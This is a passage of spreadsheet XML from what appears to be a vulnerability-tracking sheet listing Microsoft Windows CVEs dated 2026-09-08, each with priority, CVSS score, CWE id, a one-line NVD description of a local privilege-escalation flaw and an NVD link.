      <c r="K1392" s="5" t="inlineStr"/>
      <c r="L1392" s="5" t="inlineStr"/>
      <c r="M1392" s="5" t="inlineStr"/>
      <c r="N1392" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1392" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1392" s="5" t="inlineStr"/>
      <c r="Q1392" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1392" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69573</t>
        </is>
      </c>
    </row>
    <row r="1393">
      <c r="A1393" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1393" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69574</t>
        </is>
      </c>
      <c r="D1393" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1393" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1393" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1393" s="5" t="inlineStr"/>
      <c r="H1393" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1393" s="5" t="inlineStr"/>
      <c r="J1393" s="5" t="inlineStr"/>
      <c r="K1393" s="5" t="inlineStr"/>
      <c r="L1393" s="5" t="inlineStr"/>
      <c r="M1393" s="5" t="inlineStr"/>
      <c r="N1393" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1393" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1393" s="5" t="inlineStr"/>
      <c r="Q1393" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1393" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69574</t>
        </is>
      </c>
    </row>
    <row r="1394">
      <c r="A1394" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1394" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69575</t>
        </is>
      </c>
      <c r="D1394" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1394" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1394" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1394" s="5" t="inlineStr"/>
      <c r="H1394" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1394" s="5" t="inlineStr"/>
      <c r="J1394" s="5" t="inlineStr"/>
      <c r="K1394" s="5" t="inlineStr"/>
      <c r="L1394" s="5" t="inlineStr"/>
      <c r="M1394" s="5" t="inlineStr"/>
      <c r="N1394" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1394" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1394" s="5" t="inlineStr"/>
      <c r="Q1394" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1394" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Storage Spaces Controller allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69575</t>
        </is>
      </c>
    </row>
    <row r="1395">
      <c r="A1395" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1395" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69578</t>
        </is>
      </c>
      <c r="D1395" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1395" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1395" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1395" s="5" t="inlineStr"/>
      <c r="H1395" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1395" s="5" t="inlineStr"/>
      <c r="J1395" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K13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95" s="5" t="inlineStr"/>
      <c r="M1395" s="5" t="inlineStr"/>
      <c r="N1395" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1395" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1395" s="5" t="inlineStr"/>
      <c r="Q1395" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="R1395" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69578</t>
        </is>
      </c>
    </row>
    <row r="1396">
      <c r="A1396" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1396" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69581</t>
        </is>
      </c>
      <c r="D1396" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1396" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1396" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1396" s="5" t="inlineStr"/>
      <c r="H1396" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1396" s="5" t="inlineStr"/>
      <c r="J1396" s="5" t="inlineStr"/>
      <c r="K1396" s="5" t="inlineStr"/>
      <c r="L1396" s="5" t="inlineStr"/>
      <c r="M1396" s="5" t="inlineStr"/>
      <c r="N1396" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1396" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1396" s="5" t="inlineStr"/>
      <c r="Q1396" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="R1396" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69581</t>
        </is>
      </c>
    </row>
    <row r="1397">
      <c r="A1397" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1397" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69600</t>
        </is>
      </c>
      <c r="D1397" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1397" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1397" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1397" s="5" t="inlineStr"/>
      <c r="H1397" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1397" s="5" t="inlineStr"/>
      <c r="J1397" s="5" t="inlineStr"/>
      <c r="K1397" s="5" t="inlineStr"/>
      <c r="L1397" s="5" t="inlineStr"/>
      <c r="M1397" s="5" t="inlineStr"/>
      <c r="N1397" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1397" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1397" s="5" t="inlineStr"/>
      <c r="Q1397" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1397" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69600</t>
        </is>
      </c>
    </row>
    <row r="1398">
      <c r="A1398" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1398" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69605</t>
        </is>
      </c>
      <c r="D1398" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1398" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1398" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1398" s="5" t="inlineStr"/>
      <c r="H1398" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1398" s="5" t="inlineStr"/>
      <c r="J1398" s="5" t="inlineStr"/>
      <c r="K1398" s="5" t="inlineStr"/>
      <c r="L1398" s="5" t="inlineStr"/>
      <c r="M1398" s="5" t="inlineStr"/>
      <c r="N1398" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1398" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1398" s="5" t="inlineStr"/>
      <c r="Q1398" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1398" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Install Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69605</t>
        </is>
      </c>
    </row>
    <row r="1399">
      <c r="A1399" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1399" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69606</t>
        </is>
      </c>
      <c r="D1399" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1399" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1399" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1399" s="5" t="inlineStr"/>
      <c r="H1399" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1399" s="5" t="inlineStr"/>
      <c r="J1399" s="5" t="inlineStr"/>
      <c r="K1399" s="5" t="inlineStr"/>
      <c r="L1399" s="5" t="inlineStr"/>
      <c r="M1399" s="5" t="inlineStr"/>
      <c r="N1399" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1399" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1399" s="5" t="inlineStr"/>
      <c r="Q1399" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1399" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Shell allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69606</t>
        </is>
      </c>
    </row>
    <row r="1400">
      <c r="A1400" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1400" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69610</t>
        </is>
      </c>
      <c r="D1400" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1400" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1400" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1400" s="5" t="inlineStr"/>
      <c r="H1400" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1400" s="5" t="inlineStr"/>
      <c r="J1400" s="5" t="inlineStr"/>
      <c r="K1400" s="5" t="inlineStr"/>
      <c r="L1400" s="5" t="inlineStr"/>
      <c r="M1400" s="5" t="inlineStr"/>
      <c r="N1400" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1400" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1400" s="5" t="inlineStr"/>
      <c r="Q1400" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="R1400" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69610</t>
        </is>
      </c>
    </row>
    <row r="1401">
      <c r="A1401" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1401" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69611</t>
        </is>
      </c>
      <c r="D1401" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1401" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1401" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1401" s="5" t="inlineStr"/>
      <c r="H1401" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1401" s="5" t="inlineStr"/>
      <c r="J1401" s="5" t="inlineStr"/>
      <c r="K1401" s="5" t="inlineStr"/>
      <c r="L1401" s="5" t="inlineStr"/>
      <c r="M1401" s="5" t="inlineStr"/>
      <c r="N1401" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1401" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1401" s="5" t="inlineStr"/>
      <c r="Q1401" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1401" s="5" t="inlineStr">
        <is>
          <t>Use after free in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69611</t>
        </is>
      </c>
    </row>
    <row r="1402">
      <c r="A1402" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1402" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69613</t>
        </is>
      </c>
      <c r="D1402" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1402" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1402" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1402" s="5" t="inlineStr"/>
      <c r="H1402" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1402" s="5" t="inlineStr"/>
      <c r="J1402" s="5" t="inlineStr"/>
      <c r="K1402" s="5" t="inlineStr"/>
      <c r="L1402" s="5" t="inlineStr"/>
      <c r="M1402" s="5" t="inlineStr"/>
      <c r="N1402" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1402" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1402" s="5" t="inlineStr"/>
      <c r="Q1402" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1402" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69613</t>
        </is>
      </c>
    </row>
    <row r="1403">
      <c r="A1403" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1403" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69617</t>
        </is>
      </c>
      <c r="D1403" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1403" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1403" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1403" s="5" t="inlineStr"/>
      <c r="H1403" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1403" s="5" t="inlineStr"/>
      <c r="J1403" s="5" t="inlineStr"/>
      <c r="K1403" s="5" t="inlineStr"/>
      <c r="L1403" s="5" t="inlineStr"/>
      <c r="M1403" s="5" t="inlineStr"/>
      <c r="N1403" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1403" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1403" s="5" t="inlineStr"/>
      <c r="Q1403" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1403" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Resilient File System (ReFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69617</t>
        </is>
      </c>
    </row>
    <row r="1404">
      <c r="A1404" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1404" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69621</t>
        </is>
      </c>
      <c r="D1404" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1404" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1404" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1404" s="5" t="inlineStr"/>
      <c r="H1404" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1404" s="5" t="inlineStr"/>
      <c r="J1404" s="5" t="inlineStr"/>
      <c r="K1404" s="5" t="inlineStr"/>
      <c r="L1404" s="5" t="inlineStr"/>
      <c r="M1404" s="5" t="inlineStr"/>
      <c r="N1404" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1404" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1404" s="5" t="inlineStr"/>
      <c r="Q1404" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1404" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69621</t>
        </is>
      </c>
    </row>
    <row r="1405">
      <c r="A1405" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1405" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69630</t>
        </is>
      </c>
      <c r="D1405" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1405" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1405" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1405" s="5" t="inlineStr"/>
      <c r="H1405" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1405" s="5" t="inlineStr"/>
      <c r="J1405" s="5" t="inlineStr"/>
      <c r="K1405" s="5" t="inlineStr"/>
      <c r="L1405" s="5" t="inlineStr"/>
      <c r="M1405" s="5" t="inlineStr"/>
      <c r="N1405" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1405" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1405" s="5" t="inlineStr"/>
      <c r="Q1405" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1405" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69630</t>
        </is>
      </c>
    </row>
    <row r="1406">
      <c r="A1406" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1406" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69645</t>
        </is>
      </c>
      <c r="D1406" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1406" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1406" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1406" s="5" t="inlineStr"/>
      <c r="H1406" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1406" s="5" t="inlineStr"/>
      <c r="J1406" s="5" t="inlineStr"/>
      <c r="K1406" s="5" t="inlineStr"/>
      <c r="L1406" s="5" t="inlineStr"/>
      <c r="M1406" s="5" t="inlineStr"/>
      <c r="N1406" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1406" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1406" s="5" t="inlineStr"/>
      <c r="Q1406" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1406" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Message Queuing allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69645</t>
        </is>
      </c>
    </row>
    <row r="1407">
      <c r="A1407" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1407" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69648</t>
        </is>
      </c>
      <c r="D1407" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1407" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1407" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1407" s="5" t="inlineStr"/>
      <c r="H1407" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1407" s="5" t="inlineStr"/>
      <c r="J1407" s="5" t="inlineStr"/>
      <c r="K1407" s="5" t="inlineStr"/>
      <c r="L1407" s="5" t="inlineStr"/>
      <c r="M1407" s="5" t="inlineStr"/>
      <c r="N1407" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1407" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1407" s="5" t="inlineStr"/>
      <c r="Q1407" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1407" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Notification allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69648</t>
        </is>
      </c>
    </row>
    <row r="1408">
      <c r="A1408" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1408" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69652</t>
        </is>
      </c>
      <c r="D1408" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1408" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1408" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1408" s="5" t="inlineStr"/>
      <c r="H1408" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1408" s="5" t="inlineStr"/>
      <c r="J1408" s="5" t="inlineStr"/>
      <c r="K1408" s="5" t="inlineStr"/>
      <c r="L1408" s="5" t="inlineStr"/>
      <c r="M1408" s="5" t="inlineStr"/>
      <c r="N1408" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1408" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1408" s="5" t="inlineStr"/>
      <c r="Q1408" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1408" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69652</t>
        </is>
      </c>
    </row>
    <row r="1409">
      <c r="A1409" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1409" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69654</t>
        </is>
      </c>
      <c r="D1409" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1409" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1409" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1409" s="5" t="inlineStr"/>
      <c r="H1409" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1409" s="5" t="inlineStr"/>
      <c r="J1409" s="5" t="inlineStr"/>
      <c r="K1409" s="5" t="inlineStr"/>
      <c r="L1409" s="5" t="inlineStr"/>
      <c r="M1409" s="5" t="inlineStr"/>
      <c r="N1409" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1409" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1409" s="5" t="inlineStr"/>
      <c r="Q1409" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1409" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Accounts Control allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69654</t>
        </is>
      </c>
    </row>
    <row r="1410">
      <c r="A1410" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1410" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69682</t>
        </is>
      </c>
      <c r="D1410" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1410" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1410" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1410" s="5" t="inlineStr"/>
      <c r="H1410" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1410" s="5" t="inlineStr"/>
      <c r="J1410" s="5" t="inlineStr"/>
      <c r="K1410" s="5" t="inlineStr"/>
      <c r="L1410" s="5" t="inlineStr"/>
      <c r="M1410" s="5" t="inlineStr"/>
      <c r="N1410" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1410" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1410" s="5" t="inlineStr"/>
      <c r="Q1410" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="R1410" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Host Guardian Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S1410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69682</t>
        </is>
      </c>
    </row>
    <row r="1411">
      <c r="A1411" s="5" t="inlineStr">
        <is>
